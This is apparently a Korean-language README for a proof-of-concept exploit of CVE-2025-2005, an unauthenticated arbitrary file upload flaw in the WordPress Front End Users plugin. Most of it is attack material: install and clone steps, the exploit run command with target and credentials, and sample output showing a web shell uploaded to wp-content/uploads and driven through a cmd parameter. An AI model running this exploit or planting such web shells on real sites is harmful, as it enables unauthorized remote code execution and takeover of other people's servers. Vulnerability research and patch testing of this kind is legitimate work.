
WordPress FEUP 임의 파일 업로드 익스플로잇 (CVE-2025-2005)
이 저장소는 등록 양식에 MIME/파일 형식 검증이 없어 임의 파일 업로드에 취약한 WordPress Front End Users 플러그인(3.2.32까지)에 대한 PoC(Proof of Concept) 익스플로잇을 제공합니다. 이를 통해 인증되지 않은 공격자가 악성 파일(예: 웹 셸)을 업로드하여 서버에서 원격 코드 실행(RCE)으로 이어질 수 있습니다.
/register/
/signup/
pip install requests beautifulsoup4
https://github.com/mrmtwoj/CVE-2025-2005.git
cd CVE-2025-2005
python3 exploit.py --url http://target.com --user hacker --password pass123
[*] Scanning site: http://victim.com
[*] Found 17 pages.
[+] Registration form found at: http://victim.com/register
[*] Uploading shell...
[+] Shell uploaded successfully!
Location ::
http://victim.com/wp-content/uploads/shell.php
http://victim.com/wp-content/uploads/ewd-feup-user-uploads/shell.php
RUN ::
http://victim.com/wp-content/uploads/shell.php?cmd=whoami